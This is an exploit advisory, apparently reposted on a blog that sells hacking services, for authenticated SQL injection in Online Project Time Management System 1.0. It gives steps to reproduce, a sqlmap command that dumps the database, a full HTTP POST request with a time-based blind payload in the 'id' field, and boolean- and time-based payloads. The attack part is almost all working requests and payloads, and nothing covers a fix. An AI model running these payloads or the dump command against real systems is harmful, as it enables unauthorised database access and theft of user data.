Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863102473

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Online Project Time Management System 1.0 - SQLi (Authenticated)
# Date: 19/01/2022
# Exploit Author: Felipe Alcantara (Filiplain)
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15136/online-project-time-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Kali Linux

# Steps to reproduce
# Log in as an employee
# Go to : http://localhost/ptms/?page=user
# Click Update
# Save request in BurpSuite
# Run saved request with sqlmap: sqlmap -r request.txt --batch --risk 3 --level 3 --dump

==========================
POST /ptms/classes/Users.php?f=save_employee HTTP/1.1
Host: localhost
Content-Length: 1362
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary39q8yel1pdwYRLNz
Origin: http://localhost
Referer: http://localhost/ptms/?page=user
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm
Connection: close


------WebKitFormBoundary39q8yel1pdwYRLNz
Content-Disposition: form-data; name="id"

4' AND (SELECT 1 FROM (SELECT(SLEEP(4)))test)-- test
------WebKitFormBoundary39q8yel1pdwYRLNz
Content-Disposition: form-data; name="code"

2022-0003
------WebKitFormBoundary39q8yel1pdwYRLNz
Content-Disposition: form-data; name="generated_password"


------WebKitFormBoundary39q8yel1pdwYRLNz
Content-Disposition: form-data; name="firstname"

Mark 2223
------WebKitFormBoundary39q8yel1pdwYRLNz
Content-Disposition: form-data; name="middlename"

Z
------WebKitFormBoundary39q8yel1pdwYRLNz
Content-Disposition: form-data; name="lastname"

Cooper
------WebKitFormBoundary39q8yel1pdwYRLNz
Content-Disposition: form-data; name="gender"

Male
------WebKitFormBoundary39q8yel1pdwYRLNz
Content-Disposition: form-data; name="department"

IT Department
------WebKitFormBoundary39q8yel1pdwYRLNz
Content-Disposition: form-data; name="position"

Department Manager
------WebKitFormBoundary39q8yel1pdwYRLNz
Content-Disposition: form-data; name="email"

mcooper@sample.com
------WebKitFormBoundary39q8yel1pdwYRLNz
Content-Disposition: form-data; name="password"


------WebKitFormBoundary39q8yel1pdwYRLNz
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary39q8yel1pdwYRLNz--




==========================

#Payloads
#++++++++++++
#Payload: (Boolean-Based Blind)

#------WebKitFormBoundary39q8yel1pdwYRLNz
#Content-Disposition: form-data; name="id"

#4' or 1=1 --

#--------

#Payload: (time-based blind)

#------WebKitFormBoundary39q8yel1pdwYRLNz
#Content-Disposition: form-data; name="id"

#4' AND (SELECT 1 FROM (SELECT(SLEEP(4)))test)-- test

#-------